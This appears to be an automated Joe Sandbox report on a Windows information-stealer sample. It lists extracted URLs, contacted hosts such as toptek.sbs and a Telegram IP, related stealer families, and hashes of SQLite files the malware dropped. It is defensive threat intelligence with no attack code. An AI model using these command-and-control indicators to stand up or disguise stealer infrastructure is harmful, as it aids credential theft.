                                                                                                                                                                              http://anglebug.com/5375chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.26.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/5371chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/4722chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://m.google.com/devicemanagement/data/apichrome.exe, 0000000F.00000003.2536974657.00003270001C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://anglebug.com/7556chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refProcedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 00000013.00000002.2693271301.000074D00238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.24.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://drive-preprod.corp.google.com/manifest.json0.24.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://srtb.msn.cn/2cc80dabc69f58b6_1.24.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://chrome.google.com/webstore/manifest.json.24.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://bard.google.com/5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.24.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://toptek.sbsosh;Procedures.com, 0000000B.00000002.3157816062.000000000402C000.00000040.00001000.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.000000000414F000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/&chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://browser.events.data.msn.com/2cc80dabc69f58b6_1.24.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://anglebug.com/6692chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://issuetracker.google.com/258207403msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://anglebug.com/3502chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://anglebug.com/3623msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://www.office.com5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://anglebug.com/3625msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
23.219.82.75 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
142.250.181.132 | www.google.com | United States | 15169 | GOOGLEUS | false
162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
108.139.47.92 | unknown | United States | 16509 | AMAZON-02US | false
23.209.72.32 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
20.42.73.24 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.181.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
94.130.188.57 | toptek.sbs | Germany | 24940 | HETZNER-ASDE | false
18.165.220.110 | sb.scorecardresearch.com | United States | 3 | MIT-GATEWAYSUS | false

IP
192.168.2.5
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579620
Start date and time: 2024-12-23 06:22:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: trZG6pItZj.exe (renamed because original name is a hash value)
Original Sample Name: 1b31c291993985499cf544cc549e9028.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@98/292@25/16
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 74
• Number of non-executed functions: 306
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:23:08 | API Interceptor | 1x Sleep call for process: trZG6pItZj.exe modified
00:23:12 | API Interceptor | 1x Sleep call for process: Procedures.com modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                              TELEGRAMRU9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              GoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              AKAMAI-ASN1EUNeverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.237.152.235
                                                                                                                                                                                                                                                                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 23.211.121.53
                                                                                                                                                                                                                                                                              nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 172.233.106.253
                                                                                                                                                                                                                                                                              nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 172.227.252.37
                                                                                                                                                                                                                                                                              arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 23.215.103.199
                                                                                                                                                                                                                                                                              AMAZON-02UShttps://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 65.9.112.70
                                                                                                                                                                                                                                                                              https://staging.effimate.toyo.ai-powered-services.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 108.158.71.175
                                                                                                                                                                                                                                                                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 64.252.106.176
                                                                                                                                                                                                                                                                              loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 54.122.130.248
                                                                                                                                                                                                                                                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 54.96.126.18
                                                                                                                                                                                                                                                                              loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 13.247.83.253
                                                                                                                                                                                                                                                                              hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                              • 34.249.145.219
                                                                                                                                                                                                                                                                              hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                                                                                                                              hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                              • 34.249.145.219
                                                                                                                                                                                                                                                                              Space.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                                                                                                                              CLOUDFLARENETUSfKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 104.16.249.249
                                                                                                                                                                                                                                                                              fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 104.16.248.249
                                                                                                                                                                                                                                                                              https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.247.243.29
                                                                                                                                                                                                                                                                              http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.67.191.167
                                                                                                                                                                                                                                                                              Echelon.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                              • 172.67.154.166
                                                                                                                                                                                                                                                                              Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 104.21.65.145
                                                                                                                                                                                                                                                                              bas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 104.21.71.155
                                                                                                                                                                                                                                                                              Wine.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 104.21.50.161
                                                                                                                                                                                                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e199EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
installer.msi | malicious | Unknown
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
GoldenContinent.exe | malicious | Vidar
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
                                                                                                                                                                                                                                                                              • 94.130.188.57
                                                                                                                                                                                                                                                                              • 149.154.167.99
Match:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Associated Sample Name / URL | Detection | Threat Name
9EI7wrGs4K.exe | malicious | Vidar
Wine.exe | malicious | LummaC
Setup.exe | malicious | LummaC
GoldenContinent.exe | malicious | Vidar
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
Full-Setup.exe | malicious | LummaC
Setup.exe | malicious | LummaC
Setup.exe | malicious | LummaC Stealer
Full-Setup.exe | malicious | LummaC Stealer
file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                                  MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                                  SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                                  SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                                  SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2651197155152976
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:8/2qOB1nxCkMzSAELyKOMq+8yC8F/YfU5m+OlTLVuma:Bq+n0Jz9ELyKOMq+8y9/OwV
                                                                                                                                                                                                                                                                                                  MD5:189E622A20539385406A4E2B93D77FEA
                                                                                                                                                                                                                                                                                                  SHA1:C767A9909D2B01EEEC30C661953446F81989C53E
                                                                                                                                                                                                                                                                                                  SHA-256:073F92A88850AA2C355B28011592202C2CD367D99CB152BCB31A0D4FD361D458
                                                                                                                                                                                                                                                                                                  SHA-512:9F975FFBC2A834D827D7F46CA0863ABB9A785D639C47BD56BE8072B958FD365DF78EA1F9DB649A96C8F65A0FA4E844E41169E00909C31D17625889DF44FD1C3F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
